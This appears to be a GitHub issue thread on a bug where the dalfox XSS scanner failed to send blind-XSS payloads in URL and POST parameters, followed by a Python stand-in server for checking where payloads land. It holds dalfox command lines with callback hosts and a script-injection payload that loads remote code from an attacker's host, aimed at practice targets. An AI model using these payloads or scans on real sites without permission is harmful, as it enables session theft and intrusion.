Closed: tekcap closed this 1 year ago
Hi @tekcap
What is the version of dalfox? First of all, the blind XSS payload is being sent well in my env. I need to know the exact situation, so please check it! (blind XSS is sent in various patterns in various sections such as parameters and headers.)
dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 -b hahwul.xss.ht --proxy http://localhost:8090
Oh, there's one thing I found out. In the current package, parameters other than reflected ones are not being tested for blind XSS. I think this was the problem, let me check quickly!
I'm on version v2.8.1 installed with go command provided.
For some reason, the blind XSS doesn't even get sent in the url parameter. I don't see the payload anywhere in BURP
@tekcap
There was a bug in the parameter analysis and I just fixed it. Please update to v2.8.2 and check it! If it is reproduced in v2.8.2, please re-open it. Thank you very much :D
New
./dalfox version
# v2.8.2
./dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 \
-b hahwul.xss.ht \
--proxy http://localhost:8090
I just realized this issue still persists when using "file --rawdata" with a post request.
I think you fixed it for GET, but not POST.
I see the Referer header is working with the blind payload, but not the parameters
@tekcap Thank you for the report! Let me check again :D
Running a very basic Blind XSS command against a hackthebox target and it doesn't look like Dalfox is even using the blind payload.
dalfox url "http://IP/hijacking/index.php?fullname=x&username=x&password=x&email=dsfs%40joe.com&imgurl=a" -b http://IP:8080 --skip-bav --debug --skip-mining-all -p imgurl -w 1
The imgurl parameter is vulnerable to this XSS payload:
"><script src=http://IP:8080></script>
I'm assuming Dalfox will use that payload since it's a very basic one.
The debug shows this, but I'm not sure what it means:
Does the false mean that it's not attempting the blind payloads? All the other debug lines are showing me the payload that it is currently testing, but when the blind debug lines appears, it's empty, as shown above. I proxy everything through BURP and can confirm that it's not sending the blind payload.
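A quicker way to answer "is the blind payload actually being sent, and where?" than scrolling through Burp is to point dalfox at a stand-in target that records, per request, which query parameters, POST body parameters and headers carry the callback host. The following is an added example and not dalfox's own code; it assumes the callback host `hahwul.xss.ht` used with `-b` earlier in this thread and listens on `127.0.0.1:8000`.

```python
# Added example (not part of dalfox): a stand-in target that records where the
# blind-XSS callback host lands in each request it receives.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs, unquote_plus

# Assumed callback host, matching the -b value used in this thread.
MARKER = "hahwul.xss.ht"


def locate_marker(path, headers, body, marker=MARKER):
    """Return (location, name) pairs where `marker` occurs in one request.

    Locations are "query" (URL parameters), "body" (form-encoded POST
    parameters) and "header". parse_qs percent-decodes values, so an encoded
    payload such as %22%3E%3Cscript+src%3D%2F%2Fhost... is still matched.
    """
    hits = []
    for name, values in parse_qs(urlparse(path).query, keep_blank_values=True).items():
        if any(marker in v for v in values):
            hits.append(("query", name))
    for name, values in parse_qs(body or "", keep_blank_values=True).items():
        if any(marker in v for v in values):
            hits.append(("body", name))
    for name, value in headers.items():
        if marker in value:
            hits.append(("header", name))
    return hits


def coverage(records):
    """Collapse per-request hit lists into {location: sorted parameter/header names}."""
    out = {}
    for hits in records:
        for location, name in hits:
            out.setdefault(location, set()).add(name)
    return {loc: sorted(names) for loc, names in out.items()}


RECORDS = []  # one hit list per request the server has seen


class Recorder(BaseHTTPRequestHandler):
    def _handle(self):
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length).decode("utf-8", "replace") if length else ""
        hits = locate_marker(self.path, dict(self.headers.items()), body)
        RECORDS.append(hits)
        print(self.command, self.path[:80], hits)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        # Deliberately reflect the decoded query so dalfox has a reflected
        # parameter to work on; this stand-in is meant to be "vulnerable".
        self.wfile.write(unquote_plus(urlparse(self.path).query).encode())

    do_GET = do_POST = _handle

    def log_message(self, *args):  # silence the default access log
        pass


if __name__ == "__main__":
    # Example runs against this server (assumed invocation, same flags as in the thread):
    #   dalfox url "http://127.0.0.1:8000/frame?z=1" -b hahwul.xss.ht
    #   dalfox file req.txt --rawdata -b hahwul.xss.ht   # POST bodies are parsed too
    # Stop with Ctrl-C to print where the callback host was seen.
    srv = HTTPServer(("127.0.0.1", 8000), Recorder)
    try:
        srv.serve_forever()
    except KeyboardInterrupt:
        print(coverage(RECORDS))
```

If `coverage(RECORDS)` comes back with only `"header"` entries (for example just `Referer`) and no `"query"` or `"body"` names, that is exactly the "header works, parameters don't" situation described above, and the output can be pasted into the report instead of Burp screenshots.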